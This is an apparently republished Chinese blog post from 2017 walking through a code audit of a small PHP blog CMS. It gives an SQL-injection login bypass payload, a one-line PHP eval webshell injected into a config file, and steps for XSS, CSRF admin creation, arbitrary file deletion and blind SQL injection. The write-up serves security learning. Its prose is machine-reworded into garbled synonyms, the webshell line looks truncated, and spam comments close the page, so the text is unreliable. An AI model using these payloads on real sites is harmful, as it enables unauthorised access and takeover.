浅谈代码审计入门实战:某博客系统最新版审计之旅
<img src="http://mmbiz.qpic.cn/mmbiz_gif/lNJRrWgETdjt8JSl9KaeBPJf5A0l8rMcRuuiajmHQgjCLMLnsKppMjyR0TBRHibSLRZjap075UgYhyzBbKY7ZAfA/0?wx_fmt=gif&tp=webp&wxfrom=5&wx_lazy=1" style="width: 50%; margin-bottom: 20px;"><span style="color: black;">第1</span>次正式的审一次CMS,虽然只是一个很小的博客系统(提交都不<span style="color: black;">必定</span>收的那种),漏洞<span style="color: black;">亦</span>都很简单,<span style="color: black;">然则</span><span style="color: black;">亦</span>算是<span style="color: black;">累积</span>了不少经验,<span style="color: black;">因此</span>最后想来还是<span style="color: black;">这里</span>做个分享,博客系统的CMS就不说了,毕竟有个官网挂着。。。缘起某日翻阅某<span style="color: black;">伴侣</span>博客的时候无意间<span style="color: black;">发掘</span>有个小型的CMS,反正暑假闲的无聊就去审了一下代码(正好拿来练练手),问题挺严重的,好多参数都<span style="color: black;">无</span>进行过滤,光注入就有好多处,<span style="color: black;">由于</span><span style="color: black;">文案</span>篇幅有限,<span style="color: black;">这儿</span>就不一一列举了,<span style="color: black;">这儿</span>只把我找到的漏洞中每类最典型的剖析一下。<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">身份验证漏洞</p><p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">首要</span>一上来<span style="color: black;">便是</span>一个很简单的洞,后台就<span style="color: black;">能够</span>万能<span style="color: black;">秘码</span>绕过,问题出在<span style="color: black;">这儿</span>ad/login.php先看代码</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="http://mmbiz.qpic.cn/mmbiz_png/lNJRrWgETdjt8JSl9KaeBPJf5A0l8rMcP57JLqkQ2uIt9DicYlmL962h9QfpwGoOXY57aLfrCVrQblY2c4eSPRA/640?tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;"></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">这儿</span><span style="color: black;">咱们</span>并<span style="color: black;">无</span>对POST和GET参数进行过滤(一<span style="color: black;">起始</span>我还以为定义了全局过滤,结果找了半天没找到,<span style="color: black;">发掘</span><span style="color: black;">基本</span>就<span style="color: black;">无</span>过滤)<span style="color: black;">因此</span>登陆<span style="color: black;">能够</span>直接万能<span style="color: black;">秘码</span>绕过</p>
username=qweq or 1=1#
password=123<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="http://mmbiz.qpic.cn/mmbiz_png/lNJRrWgETdjt8JSl9KaeBPJf5A0l8rMcpfwpsGb3KrgJ4AXwhAKDd56rWV3X9zL98x6m76crEBQdQThhTXInYQ/640?tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;"> </p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">任意文件修改<span style="color: black;">引起</span>getshell</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">进了后台以后<span style="color: black;">咱们</span>先大致浏览一下功能,<span style="color: black;">发掘</span><span style="color: black;">这儿</span>有个修改站点信息的功能,进入后台找到相应的setconfig.php</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">咱们</span>先看一下大致的表单提交格式</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="http://mmbiz.qpic.cn/mmbiz_png/lNJRrWgETdjt8JSl9KaeBPJf5A0l8rMccDbKF23wkYOSxCWZKMleMmiazFNiauWc0LgUTlwJE09XIuyJpWia23kLw/640?tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;"></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">这儿</span><span style="color: black;">咱们</span><span style="color: black;">咱们</span><span style="color: black;">能够</span>很容易<span style="color: black;">发掘</span>它对<span style="color: black;">咱们</span>的输入并<span style="color: black;">无</span>进行任何过滤就直接替换了原文件的内容,<span style="color: black;">咱们</span><span style="color: black;">跟踪</span>到源文件</p><img src="http://mmbiz.qpic.cn/mmbiz_jpg/lNJRrWgETdjt8JSl9KaeBPJf5A0l8rMcSgKYLtrW1BwRAhe8ol6sgDBmpBTwtwLo52ta6vLaj9TibYALwyiaSpqg/640?tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;">
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">因此</span><span style="color: black;">咱们</span><span style="color: black;">能够</span>构造一句话<span style="color: black;">插进</span></p>
";@eval($_POST);/*<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="http://mmbiz.qpic.cn/mmbiz_jpg/lNJRrWgETdjt8JSl9KaeBPJf5A0l8rMcOicQf1HPfoYCRyNKQv65KyuFAxMlvGF7lTnIVU3eFy4rF2zDOou1zEw/640?tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;"><span style="color: black;">而后</span>用菜刀链接cmsconfig.php文件</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">XSS</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">既然是博客系统,<span style="color: black;">那样</span>最重要的一定是发布<span style="color: black;">文案</span>的模块,<span style="color: black;">因此</span><span style="color: black;">咱们</span>跟进去看一下,问题出在art.php先大致看一下代码<span style="color: black;">有没有</span>过滤</p>
添加<span style="color: black;">文案</span>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="http://mmbiz.qpic.cn/mmbiz_png/lNJRrWgETdjt8JSl9KaeBPJf5A0l8rMcEEzPIKC7E3HMOFYAsm5vHw9gMxmiaFMWx8toicGZp9yYf4DLS4dCfUww/640?tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;"></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">这儿</span>乍一看是<span style="color: black;">无</span>进行过滤的,接着找一下表单结构</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="http://mmbiz.qpic.cn/mmbiz_png/lNJRrWgETdjt8JSl9KaeBPJf5A0l8rMcS5v2Jbkz0sxCVeZKeNrjn21UUVZsLT3G4AEPlG8vpJQFxxR4apNsdA/640?tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;"></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">这儿</span>对$content编码进行了标签转义,<span style="color: black;">检测</span>了一下输出点后<span style="color: black;">发掘</span>绕<span style="color: black;">不外</span>,想到试试别的参数,于是找到了tags参数</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">添加<span style="color: black;">文案</span>的函数的确<span style="color: black;">无</span>过率,然而到<span style="color: black;">保留</span>页面的时候<span style="color: black;">发掘</span>存在问题,作者自己定义了一个过滤函数</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="http://mmbiz.qpic.cn/mmbiz_png/lNJRrWgETdjt8JSl9KaeBPJf5A0l8rMc8qKV1icAibyJXIpHRo1cgiaTNKIkyUJ4BUCkSHnDP95FH2d1bDDjnJeQA/640?tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;"></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">跟进去过滤函数</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="http://mmbiz.qpic.cn/mmbiz_png/lNJRrWgETdjt8JSl9KaeBPJf5A0l8rMcJqdkOicuLGnWMh46jKwyxic6IibYM4DDzYmtNzicwlJfQQUMQtFY4lLTkw/640?tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;"></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">写了一堆替换,<span style="color: black;">亦</span>没想到啥绕过<span style="color: black;">办法</span>,<span style="color: black;">而后</span>又换了另一个参数title这回<span style="color: black;">发掘</span>这个参数并<span style="color: black;">无</span>进行过滤,这是在输入的时候给了个不要输入特殊字符的警告。</p><img src="http://mmbiz.qpic.cn/mmbiz_jpg/lNJRrWgETdjt8JSl9KaeBPJf5A0l8rMc6fUib0w5lKy5mHm3ic88tYkQ2KQyYwRHs6Nn2uaJOvqKdZnliamm4ice2w/640?tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;">
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">前台查看<span style="color: black;">文案</span></p><img src="http://mmbiz.qpic.cn/mmbiz_png/lNJRrWgETdjt8JSl9KaeBPJf5A0l8rMcCtxII1UUfh21SAmTOgFhWUhbhZEtuwiaJfibt4yUluE2SrI7KKm1ty6A/640?tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;">
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">当然<span style="color: black;">这儿</span><span style="color: black;">亦</span>是存在二次注入的</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">CSRF</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">问题出在/ad/admin.php,关键代码如下</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="http://mmbiz.qpic.cn/mmbiz_png/lNJRrWgETdjt8JSl9KaeBPJf5A0l8rMcKks9g1DAO310QYhILz5yjVbLy0jKcicxLENH7F2ViaOaeOe4Wl3p1a1A/640?tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;"></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">这儿</span>并没有做相应的token认证<span style="color: black;">因此</span>可能存在csrf漏洞,<span style="color: black;">咱们</span>用burp截包</p><img src="http://mmbiz.qpic.cn/mmbiz_jpg/lNJRrWgETdjt8JSl9KaeBPJf5A0l8rMchrHbcvpzS2409ANMKzJ6Uxgibep62nlcsEUmE4BtuccJpzHQzQzUttw/640?tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;">
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">这儿</span>有个小技巧<span style="color: black;">能够</span>直接用burp直接生成csrf钓鱼页面</p>完成后丢弃这个包,<span style="color: black;">咱们</span>先看<span style="color: black;">咱们</span>的管理员有几个
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="http://mmbiz.qpic.cn/mmbiz_png/lNJRrWgETdjt8JSl9KaeBPJf5A0l8rMcMRWjCG6eKnWWbg5wict7ib0qkJTkAibsdtXG1obk5ctsgHthfxRuyWxSw/640?tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;">点击html页面的提交</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="http://mmbiz.qpic.cn/mmbiz_png/lNJRrWgETdjt8JSl9KaeBPJf5A0l8rMceqkSmEcwXBNOkRO6GxQQQNic2rcDpSfq7x1icqLn35gVafyYUMYRIGgQ/640?tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;">
</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">再后来看<span style="color: black;">咱们</span>的管理员</p><img src="http://mmbiz.qpic.cn/mmbiz_png/lNJRrWgETdjt8JSl9KaeBPJf5A0l8rMcT56pQHs7rkPia0RHvOic0y7sf2HflicUXcgLu4qs2Q2B3zb1WV9nSujVg/640?tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;">
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">任意文件删除</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">问题处在/app/dbbackup/index.php中</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">关键代码如下</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="http://mmbiz.qpic.cn/mmbiz_png/lNJRrWgETdjt8JSl9KaeBPJf5A0l8rMc60zBPcYoQHoP9icxXUbs1OkhBGL9VGVpOJyY9JZ78rrR1iaN3q9VFxYA/640?tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;"></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">这儿</span>大概看一眼就能明白,p参数可控,且<span style="color: black;">无</span>进行过滤,<span style="color: black;">因此</span><span style="color: black;">能够</span>直接删除任意文件,这种任意文件删除<span style="color: black;">通常</span><span style="color: black;">能够</span>删除install.lock从而<span style="color: black;">引起</span>重装漏洞,<span style="color: black;">这儿</span>这个博客系统是安装完成后自动把安装页面直接删除了,<span style="color: black;">因此</span>暂不存在该漏洞</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">SQL注入</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">问题出在hit.php,关键代码如下</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="http://mmbiz.qpic.cn/mmbiz_png/lNJRrWgETdjt8JSl9KaeBPJf5A0l8rMcvynRuYOIdlAibRp6GVTuf0xo2xSdHYkibDu37GpS0z526fde01IG30AQ/640?tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;"></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">看到<span style="color: black;">这儿</span>可能<span style="color: black;">非常多</span><span style="color: black;">朋友</span>认为id是<span style="color: black;">咱们</span>可控并且没有进行任何过滤的,其实作者<span style="color: black;">这儿</span>是做了过滤,关键点在<span style="color: black;">这儿</span></p><img src="http://mmbiz.qpic.cn/mmbiz_png/lNJRrWgETdjt8JSl9KaeBPJf5A0l8rMcSgwsgiaiaZ6A6JISRxA7atZuVevXhlPn1PKfuI6KXUDqc0yvfm9AqlDA/640?tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;">
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">这儿</span>引用了c_other.php的sqlguolv函数,<span style="color: black;">咱们</span>跟进去看一下</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">关键代码</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="http://mmbiz.qpic.cn/mmbiz_png/lNJRrWgETdjt8JSl9KaeBPJf5A0l8rMcy0Te1Ijwg1sfERj2B0ibWV3LccIFUhH0ZZqibe0j5u8VxwdLgbJiagzag/640?tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;"></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">这儿</span>是把$_SERVER)与关键字做了比较,起到了<span style="color: black;">必定</span>的过滤效果,然而过滤并不完全,<span style="color: black;">咱们</span>依然<span style="color: black;">能够</span>利用盲注绕过</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">绕过很简单,<span style="color: black;">这儿</span>就只贴一个payload了</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="http://mmbiz.qpic.cn/mmbiz_png/lNJRrWgETdjt8JSl9KaeBPJf5A0l8rMcRlHiaUuKNl9rmJ4UxibQoGhsbwSpgE0IGbDHWO2B4TvcUySWxKgqzl9A/640?tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;"></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">脚本懒得写了</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">做个总结吧,代码审计还是那2种老<span style="color: black;">招数</span>,<span style="color: black;">第1</span>是通读代码,<span style="color: black;">这般</span>的好处是<span style="color: black;">能够</span>挖掘<span style="color: black;">有些</span><span style="color: black;">规律</span>漏洞,<span style="color: black;">例如</span><span style="color: black;">要求</span>竞争之类的,第二是直接全局搜索,找关键函数,看变量<span style="color: black;">是不是</span>可控,<span style="color: black;">是不是</span>存在过滤balabala的,<span style="color: black;">针对</span>初学者<span style="color: black;">来讲</span>个人认为最快的<span style="color: black;">办法</span>是找一篇老旧的CMS自己尝试审计一下,<span style="color: black;">通常</span><span style="color: black;">来讲</span>是前台(浏览器)找到php,后台对应找php源码<span style="color: black;">瞧瞧</span>,主抓<span style="color: black;">有些</span>危险函数及waf函数<span style="color: black;">瞧瞧</span>有<span style="color: black;">无</span>绕过可能。</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;">本文作者:</strong> Pupil</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;">本文标题:</strong> 浅谈代码审计入门实战:某博客系统最新版审计之旅</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;">本文链接:</strong> http://pupiles.com/code-check.html</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;">发布时间:</strong>2017年8月8日 - 12时08分</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;">版权声明:</strong>
</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">本文由 Pupil 原创,采用 <span style="color: black;">保存</span>署名-非<span style="color: black;">商场</span>性<span style="color: black;">运用</span>-禁止演绎 4.0-国际许可协议 </p>转载请<span style="color: black;">保存</span>以上声明信息!点击“阅读全文”,<span style="color: black;">得到</span>更佳阅读体验<img src="http://mmbiz.qpic.cn/mmbiz_png/lNJRrWgETdjt8JSl9KaeBPJf5A0l8rMcch3ibandTUaHq7H0iaQnicBwrUiaibLt7uRVTJWSa4aglbNIEnvo83XUIKw/640?tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;">
回顾历史,我们感慨万千;放眼未来,我们信心百倍。 你说得对,我们一起加油,未来可期。 这篇文章真的让我受益匪浅,外链发布感谢分享!
页:
[1]